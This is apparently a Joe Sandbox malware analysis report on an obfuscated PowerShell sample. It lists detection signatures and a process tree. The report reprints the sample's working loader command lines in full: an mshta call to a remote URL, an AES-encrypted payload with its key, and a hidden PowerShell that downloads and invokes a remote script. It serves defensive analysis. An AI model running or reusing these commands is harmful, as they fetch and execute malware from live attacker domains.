Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1

Overview

General Information

Sample name:#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1
renamed because original name is a hash value
Original sample name: .ps1
Analysis ID:1580443
MD5:ce91da6730103e8f7311290bc43c20ad
SHA1:6e512fd63d482dc1e5fc02f91a45a56681a4f430
SHA256:5c82bdcc335fd2663b57278bda53c2f7b1a3c561e47e77807f3dd937aaa8e577
Tags:ps1user-zhuzhu0009
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Bypasses PowerShell execution policy
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7560 cmdline: "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B63195F3779B0F8E07AE51936D7659CF47354C6662908568295088267D164DBF8CD609767B8170DEFEE21B10CE5C7244C519247C7C2F9CE8D7FA4027320E443B37F498F4BCDE2E63A97AC0167DCBD9DF73193FA93B3A82859FC1C7C6A740DD7140682426D7269E3DDEB5AB9467EC828C2C24E5D9149A12D98DFF32D05203D7536888907C29CA12DFCFB29B179E5F80DF3C545318D33794FAE90BEC7C573D81530A72C3E1664C1FCD78FFE0CC509A78F2E435BEE0A9EE5E4C0F5F6825B6883A784655B387AC0A63D3779D94D06E0C3BFC63D493D83B351266304E3C6A7FE938DB9F5FFD576369C82CA0050C55C2E8E82286D9AC048EE0F6E20CF515B8D1A1268959B2D3E695204352487CF3533397B42917060A182262AA9F2EA0B93E6742C4A2C669E95CD728');$MIDMd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7872 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7752INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1c5cc:$b1: ::WriteAllBytes(
  • 0x1cc73:$b1: ::WriteAllBytes(
  • 0x1c681:$s1: -join
  • 0x1cd28:$s1: -join
  • 0x35282:$s1: -join
  • 0x42503:$s1: -join
  • 0x459c5:$s1: -join
  • 0x4605f:$s1: -join
  • 0x47b5b:$s1: -join
  • 0x49daf:$s1: -join
  • 0x4a5d6:$s1: -join
  • 0x4ae31:$s1: -join
  • 0x4b56c:$s1: -join
  • 0x4b59e:$s1: -join
  • 0x4b5e6:$s1: -join
  • 0x4b605:$s1: -join
  • 0x4be56:$s1: -join
  • 0x4bfd2:$s1: -join
  • 0x4c04a:$s1: -join
  • 0x4c0dd:$s1: -join
  • 0x4c343:$s1: -join

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7404, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4, ProcessId: 7560, ProcessName: mshta.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B63195F3779B0F8E07AE51936D7659CF47354C6662908568295088267D164DBF8CD609767B8170DEFEE21B10CE5C7244C519247C7C2F9CE8D7FA4027320E443B37F498F4BCDE2E63A97AC0167DCBD9DF73193FA93B3A82859FC1C7C6A740DD7140682426D7269E3DDEB5AB9467EC828C2C24E5D9149A12D98DFF32D05203D7536888907C29CA12DFCFB29B179E5F80DF3C545318D33794FAE90BEC7C573D81530A72C3E1664C1FCD78FFE0CC509A78F2E435BEE0A9EE5E4C0F5F6825B6883A784655B387AC0A63D3779D94D06E0C3BFC63D493D83B351266304E3C6A7FE938DB9F5FFD576369C82CA0050C55C2E8E82286D9AC048EE0F6E20CF515B8D1A1268959B2D3E695204352487CF3533397B42917060A182262AA9F2EA0B93E6742C4A2C669E95CD728');$MIDMd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E9
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B631
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", ProcessId: 7404, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B631
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1", ProcessId: 7404, ProcessName: powershell.exe
Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B63195F3779B0F8E07AE51936D7659CF47354C6662908568295088267D164DBF8CD609767B8170DEFEE21B10CE5C7244C519247C7C2F9CE8D7FA4027320E443B37F498F4BCDE2E63A97AC0167DCBD9DF73193FA93B3A82859FC1C7C6A740DD7140682426D7269E3DDEB5AB9467EC828C2C24E5D9149A12D98DFF32D05203D7536888907C29CA12DFCFB29B179E5F80DF3C545318D33794FAE90BEC7C573D81530A72C3E1664C1FCD78FFE0CC509A78F2E435BEE0A9EE5E4C0F5F6825B6883A784655B387AC0A63D3779D94D06E0C3BFC63D493D83B351266304E3C6A7FE938DB9F5FFD576369C82CA0050C55C2E8E82286D9AC048EE0F6E20CF515B8D1A1268959B2D3E695204352487CF3533397B42917060A182262AA9F2EA0B93E6742C4A2C669E95CD728');$MIDMd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E9
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7672, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://pawpaws.readit-carfanatics.com/madonna.mp4/EAvira URL Cloud: Label: malware
Source: https://pawpaws1.readit-carfanatics.com/madonna.vstxAvira URL Cloud: Label: malware
Source: http://pawpaws1.readit-carfanatics.comAvira URL Cloud: Label: malware
Source: https://pawpaws1.readit-carfanatics.comAvira URL Cloud: Label: malware
Source: https://pawpaws.readit-carfanatics.com/madonna.mp4Avira URL Cloud: Label: malware
Source: https://pawpaws.readit-carfanatics.com/madonna.mp4...Avira URL Cloud: Label: malware
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
Source: unknownHTTPS traffic detected: 172.67.201.143:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.201.143:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1782817752.00000000079B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.1769565150.0000000003319000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb//: source: powershell.exe, 00000006.00000002.1782817752.00000000079B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb. source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp
